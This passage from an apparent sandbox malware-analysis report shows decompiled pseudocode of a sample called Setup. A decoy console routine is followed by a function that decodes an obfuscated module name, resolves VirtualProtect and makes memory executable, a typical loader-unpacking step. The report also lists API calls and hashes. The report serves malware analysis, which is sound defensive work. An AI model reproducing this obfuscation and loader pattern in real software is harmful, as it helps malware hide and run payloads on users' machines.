				E0041DB50(E0041F6A0( &_v92, E0041FB80( &_v92, E0041F6A0( &_v92, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Hello, "),  &_v92), "!"), E0041D970);
				E0041F6A0(_t273, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Enter a number: ");
				_t583 = _t576 + 0x38;
				E0041E1F0(0x455bb4,  &_v32);
				_t400 = _v32 & 0x80000001;
				__eflags = _t400;
				if(_t400 < 0) {
					_t400 = (_t400 - 0x00000001 | 0xfffffffe) + 1;
					__eflags = _t400;
				}
				__eflags = _t400;
				if(__eflags != 0) {
					_t280 = E0041F6A0("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", E0041DB70("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", __eflags, _v32), " is odd.");
					_t584 = _t583 + 8;
					E0041DB50(_t280, E0041D970);
				} else {
					_t492 = _v32;
					_t332 = E0041F6A0("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", E0041DB70("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", __eflags, _v32), " is even.");
					_t584 = _t583 + 8;
					E0041DB50(_t332, E0041D970);
				}
				_v8 = 0;
				while(1) {
					__eflags = _v8 - 3;
					if(_v8 >= 3) {
						break;
					}
					_t328 = E0041F6A0(_v8, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Count: ");
					_t584 = _t584 + 8;
					E0041DB50(E0041DB70(_t328, __eflags, _v8), E0041D970);
					_t492 = _v8 + 1;
					_v8 = _v8 + 1;
				}
				_v16 = 5;
				_v96 = 0xa;
				_v112 = _v16 + _v96;
				_t284 = E0041F6A0(_v112, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Sum of a and b: ");
				_t585 = _t584 + 8;
				E0041DB50(E0041DB70(_t284, __eflags, _v112), E0041D970);
				_v28 = 0xa;
				_v164 = 1;
				while(1) {
					__eflags = _v164 - _v28;
					if(_v164 > _v28) {
						break;
					}
					_t419 = _v164 & 0x80000001;
					__eflags = _t419;
					if(_t419 < 0) {
						_t419 = (_t419 - 0x00000001 | 0xfffffffe) + 1;
						__eflags = _t419;
					}
					__eflags = _t419;
					if(__eflags != 0) {
						_t323 = E0041F6A0("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", E0041DB70("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", __eflags, _v164), " is odd.");
						_t585 = _t585 + 8;
						E0041DB50(_t323, E0041D970);
					} else {
						_t326 = E0041F6A0("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", E0041DB70("on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", __eflags, _v164), " is even.");
						_t585 = _t585 + 8;
						E0041DB50(_t326, E0041D970);
					}
					_t492 = _v164 + 1;
					__eflags = _t492;
					_v164 = _t492;
				}
				_v105 = 1;
				_t406 = _v105 & 0x000000ff;
				__eflags = _v105 & 0x000000ff;
				if((_v105 & 0x000000ff) == 0) {
					_t288 = E0041F6A0(_t406, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Flag is false!");
					_t586 = _t585 + 8;
					_t407 = _t288;
					E0041DB50(_t288, E0041D970);
				} else {
					_t319 = E0041F6A0(_t406, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Flag is true!");
					_t586 = _t585 + 8;
					_t407 = _t319;
					E0041DB50(_t319, E0041D970);
				}
				_v64 =  *0x424bdc;
				 *_t586 = _v64;
				_t290 = E0041F6A0(_t407, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Value of f: ");
				_t587 = _t586 + 8;
				_t409 = E0041DE70(_t290, __eflags, _t407);
				E0041DB50(_t291, E0041D970);
				_v116 = 0x14;
				__eflags = _v116;
				if(_v116 <= 0) {
					__eflags = _v116;
					if(_v116 >= 0) {
						_t293 = E0041F6A0(_t409, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Number is zero.");
						_t588 = _t587 + 8;
						E0041DB50(_t293, E0041D970);
					} else {
						_t315 = E0041F6A0(_t409, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Number is negative.");
						_t588 = _t587 + 8;
						E0041DB50(_t315, E0041D970);
					}
				} else {
					_t317 = E0041F6A0(_t409, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Number is positive.");
					_t588 = _t587 + 8;
					E0041DB50(_t317, E0041D970);
				}
				_v60 = 0xa;
				_v56 = 0x14;
				_v52 = 0x1e;
				_v168 = 0;
				while(1) {
					__eflags = _v168 - 3;
					if(_v168 >= 3) {
						break;
					}
					_t312 = E0041F6A0(_t310, E0041DB70(E0041F6A0( *((intOrPtr*)(_t574 + _v168 * 4 - 0x38)), "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Array element "), __eflags, _v168), ": ");
					_t588 = _t588 + 0x10;
					E0041DB50(E0041DB70(_t312, __eflags,  *((intOrPtr*)(_t574 + _v168 * 4 - 0x38))), E0041D970);
					_t492 = _v168 + 1;
					__eflags = _t492;
					_v168 = _t492;
				}
				GetEnvironmentStringsW();
				asm("ror edx, 0x86");
				asm("sbb edi, 0x6");
				asm("bswap ebx");
				asm("bswap esi");
				asm("sbb esi, 0x8");
				asm("rcr esi, 0x42");
				asm("rol eax, 0x5d");
				asm("rcr edx, 1");
				asm("rol eax, 0x78");
				asm("ror ebx, 0x59");
				asm("rcl ebx, 0x30");
				asm("rol eax, 0x49");
				asm("bswap esi");
				asm("rol eax, 0x79");
				asm("rcr esi, 0x34");
				__eflags = 0xf4;
				asm("rcl esi, 0x5d");
				_v172 = 0;
				E00401070( &_v92);
				return _v172;
			}



















































































                                                                                                                                                                                              0x0041cfcc
                                                                                                                                                                                              0x0041cfd5
                                                                                                                                                                                              0x0041cfdf
                                                                                                                                                                                              0x0041cfee
                                                                                                                                                                                              0x0041cff3
                                                                                                                                                                                              0x0041cffc
                                                                                                                                                                                              0x0041d00a
                                                                                                                                                                                              0x0041d019
                                                                                                                                                                                              0x0041d01f
                                                                                                                                                                                              0x0041d022
                                                                                                                                                                                              0x0041d025
                                                                                                                                                                                              0x0041d029
                                                                                                                                                                                              0x0041d02b
                                                                                                                                                                                              0x0041d039
                                                                                                                                                                                              0x0041d042
                                                                                                                                                                                              0x0041d048
                                                                                                                                                                                              0x0041d04b
                                                                                                                                                                                              0x0041d056
                                                                                                                                                                                              0x0041d059
                                                                                                                                                                                              0x0041d05d
                                                                                                                                                                                              0x0041d061
                                                                                                                                                                                              0x0041d065
                                                                                                                                                                                              0x0041d069
                                                                                                                                                                                              0x0041d06d
                                                                                                                                                                                              0x0041d071
                                                                                                                                                                                              0x0041d075
                                                                                                                                                                                              0x0041d079
                                                                                                                                                                                              0x0041d07d
                                                                                                                                                                                              0x0041d081
                                                                                                                                                                                              0x0041d085
                                                                                                                                                                                              0x0041d089
                                                                                                                                                                                              0x0041d08d
                                                                                                                                                                                              0x0041d0a8
                                                                                                                                                                                              0x0041d0bf
                                                                                                                                                                                              0x0041d0db
                                                                                                                                                                                              0x0041d0ea
                                                                                                                                                                                              0x0041d106
                                                                                                                                                                                              0x0041d115
                                                                                                                                                                                              0x0041d131
                                                                                                                                                                                              0x0041d144
                                                                                                                                                                                              0x0041d153
                                                                                                                                                                                              0x0041d166
                                                                                                                                                                                              0x0041d182
                                                                                                                                                                                              0x0041d192
                                                                                                                                                                                              0x0041d1ae
                                                                                                                                                                                              0x0041d1c1
                                                                                                                                                                                              0x0041d1d0
                                                                                                                                                                                              0x0041d1ec
                                                                                                                                                                                              0x0041d1ff
                                                                                                                                                                                              0x0041d21a
                                                                                                                                                                                              0x0041d229
                                                                                                                                                                                              0x0041d23b
                                                                                                                                                                                              0x0041d256
                                                                                                                                                                                              0x0041d268
                                                                                                                                                                                              0x0041d284
                                                                                                                                                                                              0x0041d297
                                                                                                                                                                                              0x0041d2a6
                                                                                                                                                                                              0x0041d2b9
                                                                                                                                                                                              0x0041d2c8
                                                                                                                                                                                              0x0041d2da
                                                                                                                                                                                              0x0041d0a2
                                                                                                                                                                                              0x0041d0a2
                                                                                                                                                                                              0x0041d2ed
                                                                                                                                                                                              0x0041d2f0
                                                                                                                                                                                              0x0041d2f4
                                                                                                                                                                                              0x0041d2fb
                                                                                                                                                                                              0x0041d305
                                                                                                                                                                                              0x0041d30b
                                                                                                                                                                                              0x0041d312
                                                                                                                                                                                              0x0041d355
                                                                                                                                                                                              0x0041d35a
                                                                                                                                                                                              0x0041d35f
                                                                                                                                                                                              0x0041d314
                                                                                                                                                                                              0x0041d31a
                                                                                                                                                                                              0x0041d320
                                                                                                                                                                                              0x0041d335
                                                                                                                                                                                              0x0041d33a
                                                                                                                                                                                              0x0041d33f
                                                                                                                                                                                              0x0041d33f
                                                                                                                                                                                              0x0041d312
                                                                                                                                                                                              0x0041d367
                                                                                                                                                                                              0x0041d36c
                                                                                                                                                                                              0x0041d375
                                                                                                                                                                                              0x0041d37f
                                                                                                                                                                                              0x0041d38e
                                                                                                                                                                                              0x0041d393
                                                                                                                                                                                              0x0041d39c
                                                                                                                                                                                              0x0041d3aa
                                                                                                                                                                                              0x0041d3b9
                                                                                                                                                                                              0x0041d3bf
                                                                                                                                                                                              0x0041d3c2
                                                                                                                                                                                              0x0041d3c5
                                                                                                                                                                                              0x0041d3cb
                                                                                                                                                                                              0x0041d3d9
                                                                                                                                                                                              0x0041d3e2
                                                                                                                                                                                              0x0041d3e8
                                                                                                                                                                                              0x0041d3f6
                                                                                                                                                                                              0x0041d3f9
                                                                                                                                                                                              0x0041d3fe
                                                                                                                                                                                              0x0041d405
                                                                                                                                                                                              0x0041d40f
                                                                                                                                                                                              0x0041d412
                                                                                                                                                                                              0x0041d443
                                                                                                                                                                                              0x0041d448
                                                                                                                                                                                              0x0041d44b
                                                                                                                                                                                              0x0041d44d
                                                                                                                                                                                              0x0041d414
                                                                                                                                                                                              0x0041d423
                                                                                                                                                                                              0x0041d428
                                                                                                                                                                                              0x0041d42b
                                                                                                                                                                                              0x0041d42d
                                                                                                                                                                                              0x0041d42d
                                                                                                                                                                                              0x0041d452
                                                                                                                                                                                              0x0041d46d
                                                                                                                                                                                              0x0041d46d
                                                                                                                                                                                              0x0041d474
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041d48c
                                                                                                                                                                                              0x0041d491
                                                                                                                                                                                              0x0041d49d
                                                                                                                                                                                              0x0041d464
                                                                                                                                                                                              0x0041d464
                                                                                                                                                                                              0x0041d467
                                                                                                                                                                                              0x0041d467
                                                                                                                                                                                              0x0041d4a4
                                                                                                                                                                                              0x0041d4ae
                                                                                                                                                                                              0x0041d4b5
                                                                                                                                                                                              0x0041d4bc
                                                                                                                                                                                              0x0041d4c3
                                                                                                                                                                                              0x0041d4ca
                                                                                                                                                                                              0x0041d4d1
                                                                                                                                                                                              0x0041d4ec
                                                                                                                                                                                              0x0041d4ec
                                                                                                                                                                                              0x0041d4f3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041d4f5
                                                                                                                                                                                              0x0041d505
                                                                                                                                                                                              0x0041d4e3
                                                                                                                                                                                              0x0041d4e3
                                                                                                                                                                                              0x0041d4e6
                                                                                                                                                                                              0x0041d4e6
                                                                                                                                                                                              0x0041d52e
                                                                                                                                                                                              0x0041d536
                                                                                                                                                                                              0x0041d545
                                                                                                                                                                                              0x0041d556
                                                                                                                                                                                              0x0041d568
                                                                                                                                                                                              0x0041d592
                                                                                                                                                                                              0x0041d5a1
                                                                                                                                                                                              0x0041d5a6
                                                                                                                                                                                              0x0041d5b2
                                                                                                                                                                                              0x0041d5ba
                                                                                                                                                                                              0x0041d5ba
                                                                                                                                                                                              0x0041d5c0
                                                                                                                                                                                              0x0041d5c6
                                                                                                                                                                                              0x0041d5c6
                                                                                                                                                                                              0x0041d5c6
                                                                                                                                                                                              0x0041d5c7
                                                                                                                                                                                              0x0041d5c9
                                                                                                                                                                                              0x0041d60e
                                                                                                                                                                                              0x0041d613
                                                                                                                                                                                              0x0041d618
                                                                                                                                                                                              0x0041d5cb
                                                                                                                                                                                              0x0041d5d5
                                                                                                                                                                                              0x0041d5e4
                                                                                                                                                                                              0x0041d5e9
                                                                                                                                                                                              0x0041d5ee
                                                                                                                                                                                              0x0041d5ee
                                                                                                                                                                                              0x0041d61d
                                                                                                                                                                                              0x0041d624
                                                                                                                                                                                              0x0041d624
                                                                                                                                                                                              0x0041d628
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041d63d
                                                                                                                                                                                              0x0041d642
                                                                                                                                                                                              0x0041d64e
                                                                                                                                                                                              0x0041d656
                                                                                                                                                                                              0x0041d659
                                                                                                                                                                                              0x0041d659
                                                                                                                                                                                              0x0041d65e
                                                                                                                                                                                              0x0041d665
                                                                                                                                                                                              0x0041d672
                                                                                                                                                                                              0x0041d688
                                                                                                                                                                                              0x0041d68d
                                                                                                                                                                                              0x0041d699
                                                                                                                                                                                              0x0041d69e
                                                                                                                                                                                              0x0041d6a5
                                                                                                                                                                                              0x0041d6c0
                                                                                                                                                                                              0x0041d6c6
                                                                                                                                                                                              0x0041d6c9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041d6d1
                                                                                                                                                                                              0x0041d6d1
                                                                                                                                                                                              0x0041d6d7
                                                                                                                                                                                              0x0041d6dd
                                                                                                                                                                                              0x0041d6dd
                                                                                                                                                                                              0x0041d6dd
                                                                                                                                                                                              0x0041d6de
                                                                                                                                                                                              0x0041d6e0
                                                                                                                                                                                              0x0041d72b
                                                                                                                                                                                              0x0041d730
                                                                                                                                                                                              0x0041d735
                                                                                                                                                                                              0x0041d6e2
                                                                                                                                                                                              0x0041d6fe
                                                                                                                                                                                              0x0041d703
                                                                                                                                                                                              0x0041d708
                                                                                                                                                                                              0x0041d708
                                                                                                                                                                                              0x0041d6b7
                                                                                                                                                                                              0x0041d6b7
                                                                                                                                                                                              0x0041d6ba
                                                                                                                                                                                              0x0041d6ba
                                                                                                                                                                                              0x0041d73f
                                                                                                                                                                                              0x0041d743
                                                                                                                                                                                              0x0041d747
                                                                                                                                                                                              0x0041d749
                                                                                                                                                                                              0x0041d77a
                                                                                                                                                                                              0x0041d77f
                                                                                                                                                                                              0x0041d782
                                                                                                                                                                                              0x0041d784
                                                                                                                                                                                              0x0041d74b
                                                                                                                                                                                              0x0041d75a
                                                                                                                                                                                              0x0041d75f
                                                                                                                                                                                              0x0041d762
                                                                                                                                                                                              0x0041d764
                                                                                                                                                                                              0x0041d764
                                                                                                                                                                                              0x0041d78f
                                                                                                                                                                                              0x0041d79b
                                                                                                                                                                                              0x0041d7a8
                                                                                                                                                                                              0x0041d7ad
                                                                                                                                                                                              0x0041d7b7
                                                                                                                                                                                              0x0041d7b9
                                                                                                                                                                                              0x0041d7be
                                                                                                                                                                                              0x0041d7c5
                                                                                                                                                                                              0x0041d7c9
                                                                                                                                                                                              0x0041d7eb
                                                                                                                                                                                              0x0041d7ef
                                                                                                                                                                                              0x0041d820
                                                                                                                                                                                              0x0041d825
                                                                                                                                                                                              0x0041d82a
                                                                                                                                                                                              0x0041d7f1
                                                                                                                                                                                              0x0041d800
                                                                                                                                                                                              0x0041d805
                                                                                                                                                                                              0x0041d80a
                                                                                                                                                                                              0x0041d80a
                                                                                                                                                                                              0x0041d7cb
                                                                                                                                                                                              0x0041d7da
                                                                                                                                                                                              0x0041d7df
                                                                                                                                                                                              0x0041d7e4
                                                                                                                                                                                              0x0041d7e4
                                                                                                                                                                                              0x0041d82f
                                                                                                                                                                                              0x0041d836
                                                                                                                                                                                              0x0041d83d
                                                                                                                                                                                              0x0041d844
                                                                                                                                                                                              0x0041d85f
                                                                                                                                                                                              0x0041d85f
                                                                                                                                                                                              0x0041d866
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041d89e
                                                                                                                                                                                              0x0041d8a3
                                                                                                                                                                                              0x0041d8af
                                                                                                                                                                                              0x0041d856
                                                                                                                                                                                              0x0041d856
                                                                                                                                                                                              0x0041d859
                                                                                                                                                                                              0x0041d859
                                                                                                                                                                                              0x0041d8b6
                                                                                                                                                                                              0x0041d8bc
                                                                                                                                                                                              0x0041d8c5
                                                                                                                                                                                              0x0041d8cf
                                                                                                                                                                                              0x0041d8de
                                                                                                                                                                                              0x0041d8e3
                                                                                                                                                                                              0x0041d8ec
                                                                                                                                                                                              0x0041d8fa
                                                                                                                                                                                              0x0041d909
                                                                                                                                                                                              0x0041d90f
                                                                                                                                                                                              0x0041d912
                                                                                                                                                                                              0x0041d915
                                                                                                                                                                                              0x0041d91b
                                                                                                                                                                                              0x0041d929
                                                                                                                                                                                              0x0041d932
                                                                                                                                                                                              0x0041d938
                                                                                                                                                                                              0x0041d941
                                                                                                                                                                                              0x0041d946
                                                                                                                                                                                              0x0041d949
                                                                                                                                                                                              0x0041d956
                                                                                                                                                                                              0x0041d967

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000007), ref: 0041D2E7
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 0041D2FF
                                                                                                                                                                                              • FreeConsole.KERNELBASE ref: 0041D320
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressConsoleFreeHandleModuleProc
                                                                                                                                                                                              • String ID: is even.$ is even.$ is odd.$ is odd.$($1$Array element $Console freed.$Count: $Enter a number: $Enter your name: $Failed to retrieve function address.$Flag is false!$Flag is true!$FreeConsole$Hello, $Number is negative.$Number is positive.$Number is zero.$Sum of a and b: $Sum of array elements: $Value of f: $b$g$i = $x is equal to y!$x is not equal to y!$z$\E$\E$\E$\E
                                                                                                                                                                                              • API String ID: 1635486814-1074547280
                                                                                                                                                                                              • Opcode ID: c1980645404afa6bc787d67d13f22e7cf44f9e5ddd9fc23d7c46053469c553d4
                                                                                                                                                                                              • Instruction ID: 5795107405fddd39d99f5bd5d8021a584393b21c79d007a99e926bbe00b097c0
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1980645404afa6bc787d67d13f22e7cf44f9e5ddd9fc23d7c46053469c553d4
                                                                                                                                                                                              • Instruction Fuzzy Hash: D43238B0F043B84ADB10AB758C167FCBE71AB91305F54819BE48DB72C2C97C5AC98B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00418CF0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 186librarymemoryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 194 418cf0-418d4a 196 418d50-418e73 194->196 197 418e78-418f4a GetModuleHandleA GetProcAddress VirtualProtect 194->197
                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                              			E00418CF0(void* _a4, long _a8) {
				long _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed int _v36;
				signed int _v37;
				void* _t222;

				_v12 = "VirtualProtect";
				_v32 = 0x80;
				_v31 = 0xa4;
				_v30 = 0xe0;
				_v29 = 0x41;
				_v28 = 3;
				_v27 = 0xc3;
				_v26 = 0x51;
				_v25 = 4;
				_v24 = 0xf0;
				_v23 = 0xd3;
				_v22 = 0x51;
				_v21 = 0xd0;
				_v20 = 0xd;
				_v36 = 0;
				while(_v36 < 0xd) {
					_v37 =  *((intOrPtr*)(_t222 + _v36 - 0x1c));
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) - 0x4d;
					_v37 = _v37 & 0x000000ff ^ 0x00000050;
					_v37 = (_v37 & 0x000000ff) - 0x4e;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) - 0xe5;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) - _v36;
					_v37 = _v37 & 0x000000ff ^ _v36;
					_v37 = (_v37 & 0x000000ff) - 0xc4;
					_v37 = _v37 & 0x000000ff ^ 0x0000006d;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) >> 0x00000006 | (_v37 & 0x000000ff) << 0x00000002;
					_v37 = (_v37 & 0x000000ff) + _v36;
					_v37 =  !(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) + 0xab;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) + 0x92;
					_v37 = _v37 & 0x000000ff ^ 0x000000f8;
					_v37 = (_v37 & 0x000000ff) + _v36;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = _v37 & 0x000000ff ^ 0x000000cd;
					_v37 = (_v37 & 0x000000ff) + 0x90;
					_v37 = _v37 & 0x000000ff ^ 0x0000002b;
					_v37 = (_v37 & 0x000000ff) - 1;
					 *((char*)(_t222 + _v36 - 0x1c)) = _v37;
					_v36 = _v36 + 1;
				}
				asm("ror edx, 0x86");
				asm("sbb edi, 0x6");
				asm("bswap ebx");
				asm("bswap esi");
				asm("sbb esi, 0x8");
				asm("rcr esi, 0x42");
				asm("rol eax, 0x5d");
				asm("rcr edx, 1");
				asm("rol eax, 0x78");
				asm("ror ebx, 0x59");
				asm("rcl ebx, 0x30");
				asm("rol eax, 0x49");
				asm("bswap esi");
				asm("rol eax, 0x79");
				asm("rcr esi, 0x34");
				asm("rcl esi, 0x5d");
				_v16 = GetModuleHandleA( &_v32);
				_v8 = 0;
				 *0x455a20 = GetProcAddress(_v16, _v12);
				VirtualProtect(_a4, _a8, 0x40,  &_v8); // executed
				return 0;
			}






















                                                                                                                                                                                              0x00418cf9
                                                                                                                                                                                              0x00418d00
                                                                                                                                                                                              0x00418d04
                                                                                                                                                                                              0x00418d08
                                                                                                                                                                                              0x00418d0c
                                                                                                                                                                                              0x00418d10
                                                                                                                                                                                              0x00418d14
                                                                                                                                                                                              0x00418d18
                                                                                                                                                                                              0x00418d1c
                                                                                                                                                                                              0x00418d20
                                                                                                                                                                                              0x00418d24
                                                                                                                                                                                              0x00418d28
                                                                                                                                                                                              0x00418d2c
                                                                                                                                                                                              0x00418d30
                                                                                                                                                                                              0x00418d34
                                                                                                                                                                                              0x00418d46
                                                                                                                                                                                              0x00418d57
                                                                                                                                                                                              0x00418d60
                                                                                                                                                                                              0x00418d6a
                                                                                                                                                                                              0x00418d74
                                                                                                                                                                                              0x00418d7e
                                                                                                                                                                                              0x00418d87
                                                                                                                                                                                              0x00418d94
                                                                                                                                                                                              0x00418d9d
                                                                                                                                                                                              0x00418da7
                                                                                                                                                                                              0x00418db1
                                                                                                                                                                                              0x00418dbd
                                                                                                                                                                                              0x00418dc7
                                                                                                                                                                                              0x00418dd0
                                                                                                                                                                                              0x00418de3
                                                                                                                                                                                              0x00418ded
                                                                                                                                                                                              0x00418df6
                                                                                                                                                                                              0x00418e03
                                                                                                                                                                                              0x00418e0c
                                                                                                                                                                                              0x00418e18
                                                                                                                                                                                              0x00418e25
                                                                                                                                                                                              0x00418e2f
                                                                                                                                                                                              0x00418e38
                                                                                                                                                                                              0x00418e45
                                                                                                                                                                                              0x00418e52
                                                                                                                                                                                              0x00418e5c
                                                                                                                                                                                              0x00418e66
                                                                                                                                                                                              0x00418e6f
